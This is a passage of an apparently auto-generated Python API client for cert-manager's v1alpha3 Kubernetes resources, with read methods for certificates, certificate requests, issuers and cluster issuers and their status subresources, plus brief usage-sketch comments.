kwargs['_return_http_data_only'] = True
return self.read_cluster_issuer_status_with_http_info(name, **kwargs) # noqa: E501
def read_cluster_issuer_status_with_http_info(self, name, **kwargs): # noqa: E501
"""read_cluster_issuer_status # noqa: E501
read status of the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_cluster_issuer_status_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: if True, return only the response data,
without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_cluster_issuer_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_cluster_issuer_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
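# Usage sketch (illustrative): per the Kubernetes resourceVersion
# semantics linked in the docstring, resource_version="0" allows the
# server to answer from any (possibly cached) version rather than
# requiring a quorum read. The ClusterIssuer name is hypothetical.
# >>> issuer = api.read_cluster_issuer_status("letsencrypt-prod",
# ...                                         resource_version="0")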
def read_namespaced_certificate(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate # noqa: E501
read the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_namespaced_certificate_with_http_info(name, namespace, **kwargs) # noqa: E501
def read_namespaced_certificate_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate # noqa: E501
read the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: if True, return only the response data,
without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_namespaced_certificate`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `read_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
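# Usage sketch (illustrative): _request_timeout accepts either a single
# number (total timeout) or a (connection, read) tuple, as documented
# above. `api` and the object names are assumptions.
# >>> cert = api.read_namespaced_certificate("my-cert", "default",
# ...                                        _request_timeout=(3.0, 10.0))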
def read_namespaced_certificate_request(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate_request # noqa: E501
read the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_request(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_namespaced_certificate_request_with_http_info(name, namespace, **kwargs) # noqa: E501
def read_namespaced_certificate_request_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate_request # noqa: E501
read the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_request_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: if True, return only the response data,
without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `read_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
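# Usage sketch (illustrative): with async_req=True the call returns a
# worker-thread handle immediately; .get() blocks until the
# CertificateRequest has been fetched. Names are hypothetical.
# >>> thread = api.read_namespaced_certificate_request("my-csr", "default",
# ...                                                  async_req=True)
# >>> req = thread.get()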
def read_namespaced_certificate_request_status(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate_request_status # noqa: E501
read status of the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_request_status(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_namespaced_certificate_request_status_with_http_info(name, namespace, **kwargs) # noqa: E501
def read_namespaced_certificate_request_status_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate_request_status # noqa: E501
read status of the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_request_status_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: if True, return only the response data,
without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_certificate_request_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_namespaced_certificate_request_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `read_namespaced_certificate_request_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_certificate_status(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate_status # noqa: E501
read status of the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_status(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_namespaced_certificate_status_with_http_info(name, namespace, **kwargs) # noqa: E501
def read_namespaced_certificate_status_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_certificate_status # noqa: E501
read status of the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_certificate_status_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: if True, return only the response data,
without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_certificate_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_namespaced_certificate_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `read_namespaced_certificate_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
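# Usage sketch (illustrative): reading the status subresource and
# inspecting its conditions. The `.status.conditions` attributes are
# assumptions about the generated IoCertManagerV1alpha3Certificate model.
# >>> cert = api.read_namespaced_certificate_status("my-cert", "default")
# >>> ready = [c for c in (cert.status.conditions or []) if c.type == "Ready"]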
def read_namespaced_issuer(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_issuer # noqa: E501
read the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_issuer(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_namespaced_issuer_with_http_info(name, namespace, **kwargs) # noqa: E501
def read_namespaced_issuer_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_issuer # noqa: E501
read the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_issuer_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: if True, return only the response data,
without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_namespaced_issuer`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `read_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_issuer_status(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_issuer_status # noqa: E501
read status of the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_issuer_status(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_namespaced_issuer_status_with_http_info(name, namespace, **kwargs) # noqa: E501
def read_namespaced_issuer_status_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_issuer_status # noqa: E501
read status of the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_issuer_status_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: if True, return only the response data,
without the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_issuer_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_namespaced_issuer_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `read_namespaced_issuer_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
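# Usage sketch (assumed call pattern): the *_with_http_info variant returns a
# (data, status_code, headers) tuple, useful when the caller needs the HTTP
# metadata as well as the deserialized object.
#
#   data, status, headers = api.read_namespaced_issuer_status_with_http_info(
#       "letsencrypt", "default")
#   assert status == 200
#
# Passing _preload_content=False instead yields the raw urllib3.HTTPResponse
# without deserialization, so the body can be streamed or parsed manually.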
